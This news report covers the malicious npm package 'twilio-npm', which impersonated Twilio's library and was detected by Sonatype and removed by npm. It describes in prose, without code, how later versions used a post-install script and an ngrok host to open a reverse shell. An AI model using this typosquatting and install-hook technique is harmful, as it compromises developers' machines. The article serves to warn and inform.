Fortunately, the malware detection service Sonatype Release Integrity quickly detected the malware, in three versions, and removed it on Monday.
In a report released Monday, Sonatype said the library was first posted to the npm website on Friday, discovered the same day, and removed on Monday after the npm security team put the package in a blacklist.
There are many legitimate packages in the npm registry related to or representing the official Twilio service.
But according to Ax Sharma, Sonatype's security engineer, twilio-npm has nothing to do with the Twilio company. Twilio is not involved and has nothing to do with this attempted brand theft. Twilio is a leading cloud-based communications platform as a service that allows developers to create VoIP-based applications that can programmatically make and receive phone calls and text messages.
The official package of Twilio npm downloads almost half a million times a week, according to the engineer. Its high popularity explains why threat actors might be interested in catching developers with a counterfeit component of the same name.
“However, the Twilio-npm package did not hold up long enough to fool many people. Uploaded on Friday, October 30, Sontatype's Release Integrity service apparently flagged the code as suspicious a day later - artificial intelligence and machine learning clearly have uses. On Monday, November 2, the company published its findings and the code was withdrawn.
Counterfeit package is single file malware and has 3 versions available to download (1.0.0, 1.0.1 and 1.0.2). All three versions appear to have been released on the same day, October 30. Version 1.0.0 doesn't accomplish much, according to Sharma. It only includes a small manifest file, package.json, which extracts a resource located in an ngrok subdomain.
ngrok is a legitimate service that developers use when testing their application, especially to open connections to their "localhost" server applications behind NAT or a firewall. However, as of versions 1.0.1 and 1.0.2, the same manifest has its post-installation script modified to perform a sinister task, according to Sharma.
This effectively opens a backdoor on the user's machine, giving the attacker control of the compromised machine and remote code execution (RCE) capabilities. Sharma said that the reverse command interpreter only works on UNIX-based operating systems.
Developers must change IDs, secrets, and keys
The npm advisory says that developers who may have installed the malicious package before it is removed are at risk.
"Any computer on which this package is installed or working should be considered fully compromised," the npm security team said Monday, confirming Sonatype's investigation.